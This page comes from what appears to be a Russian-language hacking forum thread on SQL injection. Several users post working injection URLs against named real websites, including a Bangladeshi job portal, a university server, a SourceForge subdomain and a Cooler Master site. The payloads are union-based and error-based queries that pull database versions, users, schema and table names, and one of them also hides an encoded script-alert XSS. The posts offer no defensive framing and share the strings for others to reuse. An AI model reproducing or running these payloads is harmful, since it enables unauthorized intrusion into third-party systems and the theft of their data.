SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    149
    Likes Received:
    426
    Reputations:
    31
    Ресурс позиционирует себя как крупнейший сайт по поиску работы в Бангладеш, траф соответствует.
    Microsoft SQL Server 2012 - 11.0.7462.6
    Code:
    http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and [email protected]@version -- &Fair_Id=5713
    Code:
    http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select db_name(1)) -- &Fair_Id=5713
    Code:
    http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select top 1 name from master..sysobjects where name not in ('sp_MSalreadyhavegeneration','sp_MSwritemergeperfcounter')) -- &Fair_Id=5713
    Ну и чуть-чуть для разнообразия

    PostgreSQL 9.4.24 SIXSS (пофиксили :()
    Code:
    http://www.acb.com/menu.php?id=-7253 union select 1,(chr(60)||chr(47)||chr(100)||chr(105)||chr(118)||chr(62)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(97)||chr(108)||chr(101)||chr(114)||chr(116)||chr(40)||chr(41)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||concat_ws(chr(32)||chr(35)||chr(32),session_user,version(),array_to_string(array(select DISTINCT schemaname from pg_catalog.pg_tables),','),array_to_string(array(select tablename from pg_catalog.pg_tables where schemaname='pg_catalog'),','),array_to_string(array(select attname from pg_catalog.pg_attribute where attrelid=(select oid from pg_catalog.pg_class where relname='pg_class') AND attnum>0),','))) --%20
    Sqlite 3.7.17
    Code:
    webdocs.cs.ualberta.ca/~hwsamuel/cardea/helix/catalog.php?id=4 union select 1,(sqlite_version())||char(35,35,35,35,35)||group_concat(tbl_name),3,group_concat(sql),5,6,(select group_concat(path) from document)||char(35,35,35,35,35)||(select group_concat(url) from document),8,9 from sqlite_master --%20
    Sqlite 3.3.7
    Code:
    www.newvideos.x0.com/channel/play.php?file_id=274' union select 1,2,(select sql from sqlite_master where type='table' limit 1,1),sqlite_version(),(select sql from sqlite_master where type='table' limit 0,1),6,7,8 from sqlite_master --%20
     
    #241 Baskin-Robbins, 31 Oct 2019
    Last edited: 31 Oct 2019
    sepo, ms13, seostock and 2 others like this.
  2. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    50
    Likes Received:
    11
    Reputations:
    13
    Code:
    http://www.horus.com.eg/newdetails.php?Id=-89+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6--
     
  3. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    149
    Likes Received:
    426
    Reputations:
    31
    Поддомен sourceforge
    Code:
    http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2))) --%20
    Code:
    http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid((select schema_name from information_schema.schemata limit 1,1), 1, 63), floor(rand(0)*2))) --%20
     
    karkajoi and BabaDook like this.
  4. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    149
    Likes Received:
    426
    Reputations:
    31
    Make It Yours или привет от кулер_мастер:)
    Будь внимателен;)
    Code:
    https://makerhub.coolermaster.com/custom-lighting/download.php?id=-177 union select 1,2,3,4,5,6,(select schema_name from information_schema.schemata limit 0,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --%20
     
Loading...